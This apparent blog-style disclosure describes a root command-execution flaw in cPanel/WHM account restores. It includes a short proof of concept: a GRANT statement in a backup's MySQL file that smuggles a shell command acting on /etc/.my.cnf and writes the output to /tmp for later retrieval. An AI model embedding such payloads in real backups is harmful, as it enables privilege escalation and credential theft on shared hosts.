In WHM, there is a feature “restore account” which is used to restore a full account backup. Normal users can generate the backup from cPanel and It contains all the information for an account including the files and meta data.
One of the meta data items is MySQL grants which is located inside the backup file. When you are restoring the account using WHM UI or restorepkg command, the mysql meta file will be restored as root user.
Now you may be thinking that there’s nothing wrong, and everything looks normal. But this is really really bad because you can embed arbitrary commands in SQL files and those commands will execute when the file is restored as root user. Let me explain it.
root@server1 [/home/prajith]# cat mysql.sql \! id root@server1 [/home/prajith]# mysql < mysql.sql uid=0(root) gid=0(root) groups=0(root) root@server1 [/home/prajith]
so we can insert any linux commands to mysql meta file and this will be execute as root while restoring the account.
Here is an example:
GRANT USAGE ON *.* TO 'whmtest'@'localhost' IDENTIFIED BY PASSWORD '*A4E12252EACEA5A79<XXXXX>E11D47296FE237D5897'\g system /etc/.my.cnf >> /tmp/test.txt; GRANT ALL PRIVILEGES ON `whmtest\_pop`.* TO 'whmtest'@'localhost';
while restoring the account, mysql will execute the linux commands using system function and the output will be saved to /tmp/test.txt and later we can read this file using http request. so don’t restore the backup from untrusted source 😀